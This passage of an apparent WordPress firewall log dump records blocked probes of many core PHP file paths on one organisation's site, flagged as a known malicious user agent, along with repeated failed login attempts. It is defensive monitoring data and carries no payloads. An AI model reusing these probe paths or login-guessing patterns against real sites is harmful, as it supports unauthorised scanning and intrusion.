User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RlbXBsYXRlLWNhbnZhcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134537,1700146860.010637,1700146860.001900,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134538,1700146858.307270,1700146858.298500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134539,1700146856.513592,1700146856.503500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wpdb.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134540,1700146854.841093,1700146854.832300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134541,1700146853.198930,1700146853.190100,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-styles.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXN0eWxlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134542,1700146851.428970,1700146851.412600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-scripts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNjcmlwdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134543,1700146849.803919,1700146849.794600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134544,1700146848.291472,1700146848.282800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-duotone.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWR1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134545,1700146846.422246,1700146846.413500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134546,1700146844.452120,1700146844.426300,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-editor.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134547,1700146839.322122,1700146839.312800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/mu-plugins-old/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvbXUtcGx1Z2lucy1vbGQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134548,1700146827.872238,1700146827.863200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134549,1700146989.911144,1700146989.901400,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/elements.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2VsZW1lbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134550,1700146988.217530,1700146988.208800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/duotone.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2R1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134551,1700146986.646401,1700146986.630600,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/dimensions.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2RpbWVuc2lvbnMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134552,1700146984.878458,1700146984.868800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/border.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2JvcmRlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134621,0.000000,1700147952.022296,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134622,0.000000,1700148596.164000,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134620,0.000000,1700147302.652592,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134553,1700146983.444871,1700146983.435800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/background.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2JhY2tncm91bmQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134623,0.000000,1700149246.553609,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134624,0.000000,1700149576.316567,0x00000000000000000000FFFFB142814B,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://www.houseofplace.com/wp-login.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15','loginFailInvalidUsername',NULL,NULL),(134554,1700146977.922732,1700146977.914000,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-small-posts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LXNtYWxsLXBvc3RzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134625,0.000000,1700149918.665888,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134626,0.000000,1700150596.075080,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134619,1700147146.005618,1700147145.983500,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134555,1700146976.215724,1700146976.206700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-offset-posts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LW9mZnNldC1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134627,0.000000,1700151280.611071,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134628,0.000000,1700151963.329561,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134629,0.000000,1700152640.405817,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134630,0.000000,1700153304.699115,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134556,1700146974.514744,1700146974.505800,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-medium-posts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LW1lZGl1bS1wb3N0cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134618,1700147149.327972,1700147149.319200,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-span.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2h0bWwtYXBpL2NsYXNzLXdwLWh0bWwtc3Bhbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134557,1700146973.104757,1700146973.089700,0x00000000000000000000FFFFC2A9AF23,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns/query-grid-posts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXBhdHRlcm5zL3F1ZXJ5LWdyaWQtcG9zdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134631,0.000000,1700153977.509574,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134632,0.000000,1700154645.486733,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134633,0.000000,1700155326.980125,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134634,0.000000,1700155335.969599,0x00000000000000000000FFFF2CEBD3E8,0,200,0,0,0,'https://eckankar-colorado.org/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 